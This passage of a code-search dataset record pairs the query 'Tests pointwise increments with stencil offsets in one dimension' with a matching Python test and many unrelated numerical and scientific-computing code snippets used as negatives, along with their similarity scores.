1.0000000000005178], [0.4014557102478067, 0.19662718856027814, 0.14714271380376454, 0.12376760998544561, 0.11465015678691455, 0.11701257764627322, 0.11971607647950641, 0.12500413021169918, 0.13585072294949355, 0.15396764607614966, 0.1688776087223454, 0.19466317245480091, 0.22196728054180964, 0.25356761298043673, 0.2838683431502283, 0.32214826256665563, 0.3474420903976237, 0.38101744922057085, 0.4472615852893438, 0.4838915064306636, 0.5092442536661715, 0.5393723754562065, 0.6281883708635211, 0.6075021365541242, 0.5864414731409806, 0.8093479024729197, 0.8515064760519562, 0.8942467588311623, 0.7951232441028355, 0.8030838419531001, 0.8347245409015025, 0.7345183562814673, 0.5796857049505159, 0.9992, 0.500100020004001, 0.9997999999999997, 0.9996000000000002]]\n Func3 = [[0, 587.8353916144741, 122.51606563339197, 43.412900839437754, 23.57555460166956, 15.269810446375592,\n 10.302086288261853, 6.559749680166944, 4.733027276883256, 3.5899442373476638, 2.6188091438741785,\n 1.8973511635960179, 1.59962405851026, 1.1900558241207209, 0.9154742469037501, 0.6663774582713599,\n 0.5510310065149937, 0.3962213545720932, 0.34948402621422503, 0.25056075858741617, 0.2104583602324079,\n 0.14271205720517338, 0.14355391510677562, 0.09448580768732265, 0.09563164108618655, 0.05255180659992084,\n 0.05056730634542649, 0.04830593760483059, 0.017362995116657634, 0.018563316442158327, 0.008064516129032258,\n 1.000000000000367, 0.007556675062972293],\n [0, 0.3286716474211523, 0.13242848819742412, 0.08446949128973799, 0.06942310179309806, 0.06710098910557027,\n 0.0672674712138261, 0.07277714425838515, 0.07860653317204705, 0.08731142910806171, 
0.10727105079265914,\n 0.11444337732064816, 0.1388584129446931, 0.1545716580456971, 0.1909675139048617, 0.2078287621915297,\n 0.24481225152845482, 0.2809639446229486, 0.3427375708843379, 0.3563349568749672, 0.44658806716684524,\n 0.4323139797237823, 0.5209648901237686, 0.5384242118067787, 0.6800151114469211, 0.6244881568587771,\n 0.6892348767357834, 0.8342138924420222, 0.7306736811340057, 0.7746555651829621, 0.6684491978609626,\n 0.9988000000000005, 0.7158196134574087]]\n Func4 = [[15748.752858254895, 191.911645065407, 73.47842499410935, 30.41633464294201, 19.98626405383976, 11.452154438755791, 7.133577668465118, 5.558028573739012, 3.9221979491511965, 2.883103216560325, 2.134843944573437, 1.672594713096574, 1.2840603701894708, 0.9760043686353028, 0.7383287083076139, 0.5201345636008389, 0.3922546743466271, 0.3075443182363077, 0.2190805647347894, 0.20447301461609166, 0.13718384831088948, 0.10116884193975774, 0.06605172314636748, 0.05724132569770158, 0.05521472392638043, 0.028443817583450853, 0.030927835051546386, 0.020842194810718865, 0.014610389610389598, 0.008522010992889928, 0.999999999998485, 0.004924128228318766, 0.9999999999999153], [0.8339118479799609, 0.09465261480352483, 0.05645445767221664, 0.04042946161369488, 0.039816125266879804, 0.038808660214436394, 0.04108030531513686, 0.04722150007344185, 0.05756881734809522, 0.06174501095337855, 0.07754371601798399, 0.08835218320247393, 0.11277873469258441, 0.14265723594157298, 0.1591593134391955, 0.18294405416467058, 0.20022650693883753, 0.25880068050710453, 0.28508276563948803, 0.38530886060602676, 0.3827846845148159, 0.3989797846053703, 0.4321293982608086, 0.549123155471954, 0.6479481641468685, 0.6177554137838079, 0.7204610951008645, 0.7485830392471395, 0.8589097572148419, 0.7662293265433628, 0.9997999999999997, 0.7786256145580744, 0.9994]]\n Func5 = [[6025.007118984573, 201.67078346958766, 61.164046929888165, 28.570275345356297, 16.42844389234335, 10.118865208041463, 6.5569441993908315, 5.115524806237155, 3.670230880870961, 2.578942628606752, 1.9336145754313054, 1.3128869676600932, 1.0509490349325865, 0.8260606265098674, 0.6192337836269376, 0.39548178329078904, 0.3125342768364706, 0.2535171070520563, 0.17950996366785027, 0.1589593169850413, 0.08776166654828464, 0.07186902085373958, 0.05087852147014008, 0.04031209362808843, 0.015025041736227053, 0.017452299442196745, 0.017452299442196745], [0.4900449307377233, 0.052013394197577424, 0.02763077179222995, 0.022073148401405642, 0.021551468349526978, 0.022874943012867084, 0.025129502524592704, 0.0290677734501479, 0.03586807797479691, 0.04200099407612618, 0.05395970879783885, 0.06222885447396381, 0.08011656818055503, 0.10740529383718123, 0.13349486346877767, 0.14548961984802525, 0.16651317027639345, 0.2157377384182918, 0.2536490552393858, 0.3281846996863911, 0.3205769005384313, 0.37653580728960656, 0.42583822467919963, 0.5652911249293386, 0.5004170141784822, 0.6177302303447393, 0.6177302303447393]]\n Func6 = [[np.mean([4447.600676225763, 4028.6041733343945]), 1122.3591601299543, np.mean([566.3324626056967, 560.7330884421851]), 330.62666503822817, 210.43180030971985, 149.0424349106643, 82.3987852348437, 44.547601156494196, 26.426565843449865, 17.824560051495858, 13.783607579356286, 10.40131640361244, 7.455414078577158, 5.499251804904008, 4.302343361171181, 3.539763892078505, 2.784540963982787, 2.2236920038741386, 1.7559944701404429, 1.4584556538378022, 1.200557790786275, 1.0699270271332681, 0.8634699222550425, 0.7434193327535079, 0.5714709844638692, 0.4396553281521431, 0.3818399186003246, 
0.32953426555502685, 0.24102244704033102, 0.22355346426540507, 0.15212505517750333, 0.16001860110466576, 0.10928264810439764], [np.mean([0.2617607830185082, 0.24308742821120072]), 0.0927423079289474, 0.05568821342607846, 0.03793131631871315, 0.0278257161673426, 0.022656568305311583, 0.016435055935377363, 0.013349794613250844, 0.011828502037667653, 0.011907722737912936, 0.011906786143346124, 0.01350556077146206, 0.014414705674904129, 0.015921318603495407, 0.018673975709110842, 0.02270468991422641, 0.02309589946853888, 0.027514993109446845, 0.032185252317963355, 0.039533712217873974, 0.04836171488037051, 0.05571282912235797, 0.0662400500529835, 0.0842953982688298, 0.09463525780280219, 0.11078755407852524, 0.12333175657275465, 0.1523270728384864, 0.1633804430013571, 0.2132018494926845, 0.20858345530936606, 0.26749188764633536, 0.28116189267776115]]\n index = np.linspace(0.5, 11.3, 37)\n print(index)\n index3 = np.linspace(0.1, 9.7, 33)\n index4 = np.linspace(0.2, 9.8, 33)\n index5 = np.linspace(0.2, 7.8, 27)\n index6 = [0.15, 0.25, 0.3, 0.4, 0.45]+[0.5+i*0.2 for i in range(28)]\n\n print(index6)\n plt.plot(index, Func[1], color='purple')\n plt.plot(index, Func2[1], color='red')\n plt.plot(index3, Func3[1], color='black')\n plt.plot(index4, Func4[1], color='blue')\n plt.plot(index5, Func5[1], color='yellow')\n plt.plot(index6, Func6[1], color='orange')\n\n plt.show()", "def test_processed_points_calculation(self):\n\n assert self.test_shape.processed_points == [\n (1030.0, 525.0, \"straight\"),\n (1030.0, 475.0, \"straight\"),\n (970.0, 475.0, \"straight\"),\n (970.0, 525.0, \"straight\"),\n (1030.0, 525.0, \"straight\"),\n ]", "def test_caekl_1(d):\n assert I(d) == pytest.approx(J(d))", "def test__point_right_addition__given_vector_and_point__return_correct_point():\n assert Vector((0, 1, 2)) + Point((3, 4, 5)) == Point((3, 5, 7))", "def test_rastrigin(self):\n rastrigin = get_problem('rastrigin', dimension=self.dimension)\n self.assertEqual(rastrigin(self.array), 0.0)", "def test_sum_vec(self):\n self.init()\n assert sum_vec(self.i32_1) == np.sum(self.i32_1)\n assert sum_vec(self.fi32_1) == np.sum(self.i32_1)\n assert sum_vec(self.i64_1) == np.sum(self.i64_1)\n assert sum_vec(self.fi64_1) == np.sum(self.i64_1)\n assert sum_vec(self.f32_1) == np.sum(self.f32_1)\n assert sum_vec(self.ff32_1) == np.sum(self.ff32_1)\n assert sum_vec(self.f64_1) == np.sum(self.f64_1)\n assert sum_vec(self.ff64_1) == np.sum(self.ff64_1)", "def test_scalar_index(setup_teardown_file):\n f = setup_teardown_file[3]\n\n dset = f.create_dataset('x', shape=(), dtype='f')\n out = dset[...]\n assert isinstance(out, np.ndarray)\n assert out.shape == ()", "def test_multiply_scalar(self):\n a = Vector(1, 2)\n c = a * 3\n assert c.x == 3\n assert c.y == 6", "def test_step(self):\n fun = get_problem('step', self.dimension)\n self.assertEqual(fun(self.array), 0.0)", "def test_grid():\n with get_test_data('interpolation_test_grid.npz') as fobj:\n data = np.load(fobj)\n return data['xg'], data['yg']", "def test_area():\n\n pt0 = [0, 0]\n pt1 = [5, 5]\n pt2 = [5, 0]\n\n truth = 12.5\n\n assert isclose(truth, area([pt0, pt1, pt2]))", "def mul(Z,X,Y):", "def test_identity_function(data_and_labels):\n input_data = data_and_labels[0]\n\n output_data = unprotected_query(input_data)\n\n np.testing.assert_array_equal(input_data, output_data)", "def test_ThinDataMultiArray(self):\n for split in self.splits:\n y_data, x_data = data_process.thinData(y_testMultiple, xdim_test, split)\n for spec in y_data:\n self.assertTrue(len(spec) == 
len(x_data))", "def test_tensor_can_be_added_summation(free_alg):\n\n dr = free_alg\n p = dr.names\n i, j = p.R_dumms[:2]\n x = IndexedBase('x')\n y = IndexedBase('y')\n\n tensor = dr.sum((i, p.R), x[i, j] * y[j, i])\n\n for res in [\n dr.einst(tensor),\n dr.sum((j, p.R), tensor)\n ]:\n assert res == dr.einst(x[i, j] * y[j, i])", "def test_equal12():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([[True, False, True], [False, False, False], [True, True, False]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_multiply(self):\n self.assertEqual(work_file.multiply(10, 5), 50)\n self.assertEqual(work_file.multiply(-1, 1), -1)\n self.assertEqual(work_file.multiply(-1, -1), 1)", "def vectorized_loops(self, data):\n\n # TODO: finish this.\n return np.add(np.multiply(data,data), data)" ]
[ "0.6647943", "0.6466135", "0.6279551", "0.62339604", "0.6172996", "0.61697084", "0.6152088", "0.6150274", "0.6137789", "0.6136748", "0.6109442", "0.6009509", "0.5945426", "0.591577", "0.5912449", "0.590353", "0.5883301", "0.58808935", "0.5876383", "0.587444", "0.58706623", "0.581656", "0.5810265", "0.5808779", "0.5808747", "0.58054376", "0.5790785", "0.5774366", "0.57602584", "0.5754303", "0.57476443", "0.5722245", "0.57166797", "0.57094395", "0.57071763", "0.56934214", "0.56771004", "0.56718993", "0.5657112", "0.56514525", "0.56496596", "0.5646546", "0.55999696", "0.5596249", "0.5577879", "0.55765724", "0.5572999", "0.55707777", "0.5570443", "0.5560207", "0.55590683", "0.5558422", "0.5556445", "0.5555051", "0.5549643", "0.55482036", "0.5547855", "0.5547014", "0.5543191", "0.55410033", "0.553637", "0.5534844", "0.5528918", "0.55287313", "0.5520735", "0.5517507", "0.55145854", "0.5509618", "0.5505837", "0.55018204", "0.54962575", "0.54919636", "0.54913133", "0.5489694", "0.54886574", "0.5488327", "0.54836565", "0.54795134", "0.5476245", "0.5475535", "0.546448", "0.54505503", "0.5428535", "0.5414635", "0.54090196", "0.54072344", "0.54059136", "0.5404647", "0.54029953", "0.53987163", "0.5395909", "0.5395266", "0.5392763", "0.53914285", "0.53902376", "0.5386458", "0.53835225", "0.5380868", "0.5380585", "0.5370013", "0.53645724" ]
0.0
-1
Tests pointwise increments with stencil offsets in one dimension
def test_indexed_increment(self, expr, result):
    j, l = dimify('j l')
    a = symbol(name='a', dimensions=(j, l), value=2., mode='indexed').base
    fa = a.function
    fa.data[1:, 1:] = 0
    eqn = eval(expr)
    Operator(eqn)(fa)
    assert np.allclose(fa.data, result, rtol=1e-12)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def coordination(c, stencil=nn_stencil):\n\n coordination = np.zeros_like(c, dtype=int)\n for dx, dy in stencil:\n tmp = np.array(c, dtype=bool, copy=True)\n if dx != 0:\n tmp = np.roll(tmp, dx, 0)\n if dy != 0:\n tmp = np.roll(tmp, dy, 1)\n coordination += tmp\n return coordination", "def run_2dtest(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n xlin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n ylin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n X,Y = np.meshgrid(xlin, ylin)\n\n # Store resulting LoS integrations in results\n results = X\n for i in range(0,num_sight_lines+1):\n for j in range(0,num_sight_lines+1): \n results[i,j] = testsph(X[i,j],Y[i,j],smoothing,dim=dim)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n\n # Have to integrate across x for every y\n Int_step = np.zeros( num_sight_lines+1 )\n for iy in range(0, num_sight_lines+1):\n isfin = np.isfinite(results[iy,:])\n Int_step[iy] = integrate.trapz(results[iy,isfin], xlin[isfin])\n # Now integrate across y\n isfin = np.isfinite(Int_step)\n particle_integral = integrate.trapz(Int_step[isfin], ylin[isfin])\n # \"All smoothing lengths should integrate to the same value of unity \"\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n isfin = np.isfinite(results[0,:])\n traces.append(go.Scatter(y=results[0,isfin], x=xlin[isfin]))\n\n # The integral of the entire particle should be unity, the trace of axis will not be however\n plot(traces)", "def test_compute_pixel_ray_directions_vectorized() -> None:\n fx = 10\n fy = 10\n\n # dummy 2d coordinates in the image plane.\n uv: NDArrayInt = np.array([[12, 2], [12, 2], [12, 2], [12, 2]])\n\n # principal point is at (10,5)\n img_w = 20\n img_h = 10\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx,\n fy_px=fy,\n cx_px=img_w / 2,\n cy_px=img_h / 2,\n height_px=img_h,\n width_px=img_w,\n cam_name=\"ring_front_center\", # dummy name\n )\n ray_dirs = pinhole_camera.compute_pixel_ray_directions(uv)\n\n gt_ray_dir: NDArrayFloat = np.array([2, -3, 10.0])\n gt_ray_dir /= np.linalg.norm(gt_ray_dir)\n\n for i in range(4):\n assert np.allclose(gt_ray_dir, ray_dirs[i])", "def _evaluable_view(self, stencil, arr, offset=0):\n if self.dim == 1:\n if isinstance(stencil, Stencil):\n\n l = self.borders[0]-stencil.b[0][0]\n r = -(self.borders[1]-stencil.b[0][1])\n else:\n l = self.borders[0]-stencil[0][0]\n r = -(self.borders[1]-stencil[0][1])\n return arr[l+offset: r+offset]\n else:\n raise NotImplementedError(\"Another dimension than one \"\n \"is not supplied\")", "def test_sum_pos_4() -> None:\n # Third step, 4th square.\n assert nth(sw.sum_walk(), 2) == 4", "def test_positive_slope(self):\n slopes = []\n for i in range(100):\n neighborhood, pc = create_point_cloud_in_plane_and_neighborhood()\n slopes += list(EigenValueVectorizeFeatureExtractor().extract(pc, neighborhood, None, None, None)[6])\n np.testing.assert_array_less(np.zeros_like(slopes), slopes)", "def test_sum_pos_3() -> None:\n # 2nd step - 3rd square\n assert nth(sw.sum_walk(), 1) == 2", "def test_point_with_zero_value_is_good():\n point = np.array([0, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_lifted_index():\n pressure = np.array([1014., 1000., 997., 981.2, 947.4, 925., 914.9, 
911.,\n 902., 883., 850., 822.3, 816., 807., 793.2, 770.,\n 765.1, 753., 737.5, 737., 713., 700., 688., 685.,\n 680., 666., 659.8, 653., 643., 634., 615., 611.8,\n 566.2, 516., 500., 487., 484.2, 481., 475., 460.,\n 400.]) * units.hPa\n temperature = np.array([24.2, 24.2, 24., 23.1, 21., 19.6, 18.7, 18.4,\n 19.2, 19.4, 17.2, 15.3, 14.8, 14.4, 13.4, 11.6,\n 11.1, 10., 8.8, 8.8, 8.2, 7., 5.6, 5.6,\n 5.6, 4.4, 3.8, 3.2, 3., 3.2, 1.8, 1.5,\n -3.4, -9.3, -11.3, -13.1, -13.1, -13.1, -13.7, -15.1,\n -23.5]) * units.degC\n dewpoint = np.array([23.2, 23.1, 22.8, 22., 20.2, 19., 17.6, 17.,\n 16.8, 15.5, 14., 11.7, 11.2, 8.4, 7., 4.6,\n 5., 6., 4.2, 4.1, -1.8, -2., -1.4, -0.4,\n -3.4, -5.6, -4.3, -2.8, -7., -25.8, -31.2, -31.4,\n -34.1, -37.3, -32.3, -34.1, -37.3, -41.1, -37.7, -58.1,\n -57.5]) * units.degC\n parcel_prof = parcel_profile(pressure, temperature[0], dewpoint[0])\n li = lifted_index(pressure, temperature, parcel_prof)\n assert_almost_equal(li, -7.9115691 * units.delta_degree_Celsius, 2)", "def test_coord_preceding_fs(self):", "def test_advanced_inc_and_set(self):\r\n rng = numpy.random.RandomState(seed=utt.fetch_seed())\r\n all_inputs_var = []\r\n all_inputs_num = []\r\n all_outputs_var = []\r\n all_outputs_num = []\r\n for set_instead_of_inc in (False, True):\r\n for inplace in (False, True):\r\n for data_shape in ((10,), (4, 5), (1, 2, 3), (4, 5, 6, 7)):\r\n data_n_dims = len(data_shape)\r\n data_size = numpy.product(data_shape)\r\n # Corresponding numeric variable.\r\n data_num_init = numpy.arange(data_size, dtype=self.dtype)\r\n data_num_init = data_num_init.reshape(data_shape)\r\n inc_shapes = [data_shape[i:]\r\n for i in xrange(0, len(data_shape) + 1)]\r\n for inc_shape in inc_shapes:\r\n inc_n_dims = len(inc_shape)\r\n # We copy the numeric value to be 100% sure there is no\r\n # risk of accidentally sharing it.\r\n data_num = data_num_init.copy()\r\n # Symbolic variable to be incremented.\r\n # We create a new one every time in order not to\r\n # have duplicated variables in the function's inputs\r\n data_var = tensor.tensor(\r\n broadcastable=[False] * data_n_dims,\r\n dtype=self.dtype)\r\n # Symbolic variable with rows to be incremented.\r\n idx_var = theano.tensor.vector(dtype='int64')\r\n n_to_inc = rng.randint(data_shape[0])\r\n # Corresponding numeric variable.\r\n idx_num = rng.randint(0, data_shape[0], n_to_inc)\r\n idx_num = idx_num.astype('int64')\r\n # Symbolic variable with increment value.\r\n inc_var = tensor.tensor(\r\n broadcastable=[False] * inc_n_dims,\r\n dtype=self.dtype)\r\n # Trick for the case where `inc_shape` is the same as\r\n # `data_shape`: what we actually want is the first\r\n # shape element to be equal to the number of rows to\r\n # increment.\r\n if len(inc_shape) == len(data_shape):\r\n inc_shape = (n_to_inc,) + inc_shape[1:]\r\n inc_size = numpy.product(inc_shape)\r\n # Corresponding numeric variable.\r\n inc_num = rng.uniform(size=inc_size).astype(self.dtype)\r\n inc_num = inc_num.reshape(inc_shape)\r\n # Result of the incrementation.\r\n # (i) Theano\r\n if set_instead_of_inc:\r\n op = set_subtensor\r\n else:\r\n op = inc_subtensor\r\n output = op(data_var[idx_var], inc_var,\r\n inplace=inplace)\r\n # (ii) Numpy (note that Numpy increments only once\r\n # duplicated indices, so we cannot directly use +=).\r\n data_copy = data_num.copy()\r\n for j, idx in enumerate(idx_num):\r\n if len(inc_shape) == len(data_shape):\r\n # Special case where there is no broadcasting.\r\n if set_instead_of_inc:\r\n data_copy[idx] = inc_num[j]\r\n else:\r\n 
data_copy[idx] += inc_num[j]\r\n else:\r\n if set_instead_of_inc:\r\n data_copy[idx] = inc_num\r\n else:\r\n data_copy[idx] += inc_num\r\n data_var = theano.In(data_var, mutable=True)\r\n\r\n # Remember data for the Theano function (see below).\r\n all_inputs_var += [data_var, idx_var, inc_var]\r\n all_inputs_num += [data_num, idx_num, inc_num]\r\n all_outputs_var.append(output)\r\n all_outputs_num.append(data_copy)\r\n if False: # Enable for debugging purpose.\r\n f = self.function([data_var, idx_var, inc_var],\r\n output, accept_inplace=inplace,\r\n op=self.adv_incsub1)\r\n if inplace:\r\n # Ensure calling `f` will not alter `data_num`.\r\n data_num = data_num.copy()\r\n f_out = f(data_num.copy(), idx_num, inc_num)\r\n assert numpy.allclose(f_out, data_copy)\r\n if not inplace:\r\n # Sanity check: `data_num` should be intact.\r\n assert (data_num == data_num_init).all()\r\n\r\n # Actual test (we compile a single Theano function to make it faster).\r\n orig_warn = theano.config.warn.gpu_set_subtensor1\r\n try:\r\n theano.config.warn.gpu_set_subtensor1 = False\r\n f = self.function(all_inputs_var, all_outputs_var,\r\n accept_inplace=True,\r\n op=self.adv_incsub1,\r\n N=len(all_outputs_var))\r\n finally:\r\n theano.config.warn.gpu_set_subtensor1 = orig_warn\r\n\r\n f_outs = f(*all_inputs_num)\r\n assert len(f_outs) == len(all_outputs_num)\r\n for f_out, output_num in izip(f_outs, all_outputs_num):\r\n # NB: if this assert fails, it will probably be easier to debug if\r\n # you enable the debug code above.\r\n assert numpy.allclose(f_out, output_num)", "def test_increment(self):\n x0 = 0\n y0 = increment(x0) # y0 should be 1\n self.assertEqual(y0, 1)\n\n x1 = 100\n y1 = increment(x1) # y1 should be 101\n self.assertTrue(y1, 101)\n\n x2 = -1\n y2 = increment(x2) # y2 should be 0\n self.assertEqual(y2, 0)\n\n x3 = -1.5\n y3 = increment(x3) # y3 should be -0.5\n self.assertEqual(y3, -0.5)", "def test_output_range(self):\n byt = bytscl(self.array1)\n outside = (byt < 0) | (byt > 255)\n total = numpy.sum(outside)\n self.assertEqual(total, 0)", "def test_positional_convolution_backward():\n i = 1\n for num_batch in [1, 2, 4]:\n for num_channel in [4, 8, 12]:\n for input_height, input_width in itertools.product([10, 12, 18], [10, 12, 18]):\n for num_filter in [2, 4, 8]:\n for kernel in [(3, 3), (2, 2)]:\n for stride in [(1, 1), (2, 2)]:\n for pad in [(0, 0), (1, 1)]:\n for dilate in [(1, 1), (2, 2)]:\n # for num_group in [1, 2, 4]:\n grad_nodes = ['im_data', 'scale_data', 'weight', 'bias']\n output_height = np.floor(\n (input_height + 2 * pad[0] - dilate[0] * (kernel[0] - 1) - 1) * 1.0 / stride[0]\n ) + 1\n output_width = np.floor(\n (input_width + 2 * pad[1] - dilate[1] * (kernel[1] - 1) - 1) * 1.0 / stride[1]\n ) + 1\n im_data = np.random.rand(num_batch, num_channel, input_height, input_width)\n scale_data = \\\n np.random.rand(num_batch, num_channel, int(output_height), int(output_width))\\\n * 0.8 + 0.1\n\n weight = np.random.normal(0, 0.001, (num_filter, num_channel, kernel[0], kernel[1]))\n bias = np.random.rand(num_filter)\n\n im_data_var = mx.symbol.Variable(name=\"im_data\")\n scale_data_var = mx.symbol.Variable(name=\"scale_data\")\n weight_var = mx.symbol.Variable(name=\"weight\")\n bias_var = mx.symbol.Variable(name=\"bias\")\n op = mx.sym.contrib.PositionalConvolution(name='test_op',\n data=im_data_var,\n scale=scale_data_var,\n weight=weight_var,\n bias=bias_var,\n num_filter=num_filter,\n kernel=kernel, stride=stride, pad=pad,\n dilate=dilate\n )\n rtol, atol = 1e-4, 1e-3\n # 
absolute(a - b) <= (atol + rtol * absolute(b))\n check_numeric_gradient(op, [im_data, scale_data, weight, bias], rtol=rtol,\n atol=atol, grad_nodes=grad_nodes, ctx=mx.gpu(0))\n print(\"check numeric gradient successfully for the {} times\".format(i))\n i += 1", "def test_shift_point(self):\n point = (0,0)\n new_point = utils.shift_point(point, 3, 4)\n self.assertEqual((3,4), new_point)\n\n point = (-2.34, 1.19)\n new_point = utils.shift_point(point, 2.34, -1.19)\n self.assertEqual((0,0), new_point)", "def test_compute_pixel_ray_directions_vectorized_entireimage() -> None:\n fx = 10\n fy = 10\n\n img_w = 100\n img_h = 50\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx,\n fy_px=fy,\n cx_px=img_w / 2,\n cy_px=img_h / 2,\n height_px=img_h,\n width_px=img_w,\n cam_name=\"ring_front_center\", # dummy name\n )\n\n uv_list = []\n for u in range(img_w):\n for v in range(img_h):\n uv_list += [(u, v)]\n\n uv: NDArrayInt = np.array(uv_list)\n assert uv.shape == (img_w * img_h, 2)\n\n ray_dirs = pinhole_camera.compute_pixel_ray_directions(uv)\n\n # compare w/ vectorized, should be identical\n for i, ray_dir_vec in enumerate(ray_dirs):\n u, v = uv[i]\n ray_dir_nonvec = _compute_pixel_ray_direction(u, v, fx, fy, img_w, img_h)\n assert np.allclose(ray_dir_vec, ray_dir_nonvec)", "def test_sum_pos_5() -> None:\n # Fourth step, 5th square.\n assert nth(sw.sum_walk(), 3) == 5", "def gincrement(x,y,xr,yr,xsgn=1,ysgn=1,nstep=1,p2=False):\n \n step = 1\n \n # Bad until proven okay \n newx = None\n newy = None\n \n # X and y limits \n x0 = xr[0]\n x1 = xr[1] \n y0 = yr[0] \n y1 = yr[1] \n \n # Are we in the box? \n if (x < x0) or (x > x1) or (y < y0) or (y > y1):\n return None,None\n\n # Wrong signs \n if np.abs(xsgn) != 1: \n return None,None\n if np.abs(ysgn) != 1:\n return None,None \n \n # figuring out the case \n #bit = ((ysgn+1.)*0.5) + 2.*((xsgn+1.)*0.5) \n #bit = int(bit) \n # \n # bit (x,y) \n # 0 - (-1,-1) \n # 1 - (-1,+1) \n # 2 - (+1,-1) \n # 3 - (+1,+1) \n\n tx = x\n ty = y\n \n # Looping through all the steps \n for i in range(nstep): \n \n # p2, incrementing vertically \n if p2:\n # UP, at the end \n if (ysgn == 1) and (ty == y1):\n return None,None\n # DOWN, at the end \n if (ysgn == -1) and (ty == y0): \n return None,None\n # Not at end, normal increment \n newx = tx \n newy = ty + ysgn * step \n \n # Incrementing Sideways \n else: \n # RIGHT, xsgn = +1 \n if (xsgn == 1): \n # UP, the very end \n if (ysgn == 1) and (tx == x1) and (ty == y1): \n return None,None\n # DOWN, the very end \n if (ysgn == -1) and (tx == x1) and (ty == y0): \n return None,None\n # At end of x, increment y \n if (tx == x1): \n newx = x0 \n newy = ty + ysgn * step \n # Normal increment \n if (tx != x1): \n newx = tx + xsgn * step \n newy = ty \n \n # LEFT, xsgn = -1 \n if (xsgn == -1): \n # UP, the very end \n if (ysgn == 1) and (tx == x0) and (ty == y1): \n return None,None\n # DOWN, the very end \n if (ysgn == -1) and (tx == x0) and (ty == y0): \n return None,None\n # At end of x, increment y \n if (tx == x0): \n newx = x1 \n newy = ty + ysgn * step \n # Normal increment \n if (tx != x0): \n newx = tx + xsgn * step \n newy = ty \n \n # In case we're looping \n tx = newx \n ty = newy \n \n # Final answer \n newx = tx \n newy = ty \n\n return newx,newy", "def test_point_within_dimensions_true():\n point = np.array([10, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_pointnum2():\n shape = paramak.CapsuleVacuumVessel(outer_start_point=(100, -100), 
radius=400, thickness=25)\n assert len(shape.points) == 12\n assert len(shape.processed_points) == 13", "def test_indexed_stencil(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=0., mode='indexed').base\n fa = a.function\n b = symbol(name='b', dimensions=(j, l), value=2., mode='indexed').base\n fb = b.function\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data[1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)", "def test_cspad_xy_at_z():\n ## 'CxiDs1.0:Cspad.0)' or 'DscCsPad'\n basedir = '/reg/g/psdm/detector/alignment/cspad/calib-cxi-camera1-2014-09-24/'\n fname_geometry = basedir + '2016-06-03-geometry-cxi06216-r25-camera1-z175mm.txt'\n fname_data = basedir + '2016-06-03-chun-cxi06216-0025-DscCsPad-max.txt'\n\n geometry = GeometryAccess(fname_geometry, pbits=0o377)\n\n # get pixel coordinate index arrays:\n xyc = xc, yc = 1000, 1000\n #rows, cols = geometry.get_pixel_coord_indexes(xy0_off_pix=xyc)\n #rows, cols = geometry.get_pixel_coord_indexes(do_tilt=True)\n #rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=None, xy0_off_pix=xyc)\n rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=150000)\n\n root, ext = os.path.splitext(fname_data)\n arr = np.load(fname_data) if ext == '.npy' else np.loadtxt(fname_data, dtype=np.float)\n\n #logger.info('arr.shape=', arr.shape\n arr.shape= (32,185,388)\n\n #ave, rms = arr.mean(), arr.std()\n #amp_range = (ave-rms, ave+3*rms)\n amp_range = (0, 1000)\n logger.info('amp_range:' + str(amp_range))\n\n logger.info('shapes rows: %s cols: %s weight: %s' % (str(rows.shape), str(cols.shape), str(arr.shape)))\n img = img_from_pixel_arrays(rows,cols,W=arr)\n\n axim = gg.plotImageLarge(img,amp_range=amp_range)\n gg.move(500,10)\n gg.show()", "def test_grad_binary_int(func, motion, optimized, preserve_result, a, n):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, n)", "def offset_points(self, points: np.ndarray, offset: Point) -> np.ndarray:\r\n points[:, :, 0] += offset.x\r\n points[:, :, 1] += offset.y\r\n return points", "def bitwise_stats(traces, N, delta):\n \n X = np.zeros((N,),dtype=int)\n padded_traces = pad_traces(traces, N)\n num_traces = padded_traces.shape[0]\n \n p = np.zeros(N)\n for j in range(N):\n p[j] = np.sum(padded_traces[:,j])/num_traces\n \n c = np.concatenate((np.ones(N,), np.zeros(N,)), axis=None)\n bounds = (0,1)\n \n for i in range(N):\n A_ub = np.zeros((2*N,2*N))\n for j in range(N):\n for k in range(N):\n if j == k:\n A_ub[j,k] = -1\n A_ub[j+N,k] = -1\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n elif k > j:\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n \n b_ub = np.concatenate((p,-1*p), axis=None)\n \n A_eq0 = np.zeros((i+1,2*N))\n b_eq0 = np.zeros(i+1)\n for j in range(i+1):\n A_eq0[j,j+N] = 1\n if j==i:\n b_eq0[j] = 0\n else:\n b_eq0[j] = X[j]\n \n A_eq1 = np.zeros((i+1,2*N))\n b_eq1 = np.zeros(i+1)\n for j in range(i+1):\n A_eq1[j,j+N] = 1\n if j==i:\n b_eq1[j] = 1\n else:\n b_eq1[j] = X[j]\n \n res0 = linprog(c,A_ub,b_ub,A_eq0,b_eq0,bounds,method='interior-point')\n res1 = linprog(c,A_ub,b_ub,A_eq1,b_eq1,bounds,method='interior-point')\n if res0.fun < res1.fun:\n X[i] = 0\n else:\n X[i] = 1\n \n return X", "def test_p1_extended_segment(grid):\n space = bempp.api.function_space(\n 